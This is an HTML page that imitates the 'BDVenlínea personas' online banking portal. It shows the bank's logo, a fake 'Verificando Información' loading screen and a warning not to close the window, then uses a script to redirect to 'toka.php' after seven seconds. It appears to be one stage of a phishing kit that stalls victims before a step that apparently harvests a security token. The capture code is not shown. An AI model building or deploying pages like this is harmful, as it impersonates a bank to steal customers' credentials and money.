<!DOCTYPE html>
<html lang="es">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<style>
		body {
			transition: opacity ease-in 0.2s;
		}
		body[unresolved] {
			opacity: 0;
			display: block;
			overflow: hidden;
			position: relative;
		}
	</style>
	<title>BDVenlínea personas</title>
	<script src="js/jquery.min.js"></script>
	<meta content="width=device-width, initial-scale=1" name="viewport">
    <link rel="shortcut icon" href="img/favicon-16x16.png" type="image/x-icon">
	<link href="css/estilo.css" rel="stylesheet">
	<link href="css/estilos.css" rel="stylesheet">
	<link href="css/pup.css" rel="stylesheet">
	<style type="text/css">
		#_copy{align-items:center;background:#4494d5;border-radius:3px;color:#fff;cursor:pointer;display:flex;font-size:13px;height:30px;justify-content:center;position:absolute;width:60px;z-index:1000}#select-tooltip,#sfModal,.modal-backdrop,div[id^=reader-helper]{display:none!important}.modal-open{overflow:auto!important}._sf_adjust_body{padding-right:0!important}.super_copy_btns_div{position:fixed;width:154px;left:10px;top:45%;background:#e7f1ff;border:2px solid #4595d5;font-weight:600;border-radius:2px;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;z-index:5000}.super_copy_btns_logo{width:100%;background:#4595d5;text-align:center;font-size:12px;color:#e7f1ff;line-height:30px;height:30px}.super_copy_btns_btn{display:block;width:128px;height:28px;background:#7f5711;border-radius:4px;color:#fff;font-size:12px;border:0;outline:0;margin:8px auto;font-weight:700;cursor:pointer;opacity:.9}.super_copy_btns_btn:hover{opacity:.8}.super_copy_btns_btn:active{opacity:1}
	</style>
</head>
<body style="overflow: hidden;
background-color: #ededed;
background-image: url(img/wallp.webp);
background-position: center center;
background-size: cover;
background-repeat: no-repeat;
height: 100vh;">
		<section class="containerCustom" id="docPopup" style="display: block;">
			<div class="overlay">
				<div class="modalCustom">
					<center>
						<img src="img/logotipo.png" style="border-radius: 10px;" width="225px"><br>
						<h1 class="title" style="font-size: 21px ; font-size: 21px;
						font-family: system-ui;
						color: grey; font-weight: 600;">Verificando Información</h1>
						<hr>
						<br>
						<div class="">
							<img style="    width: 88px;" src="img/cargando.gif" alt="">
						</div>
						<br>
						<p style="font-size: 14px;">Espera un momento, no cierres esta ventana.</p>
					</center>
				</div>
			</div>
		</section>
        <script>
            setTimeout(function() {
                window.location.href = "toka.php";
            }, 7000);
        </script>
		
</body>

</html>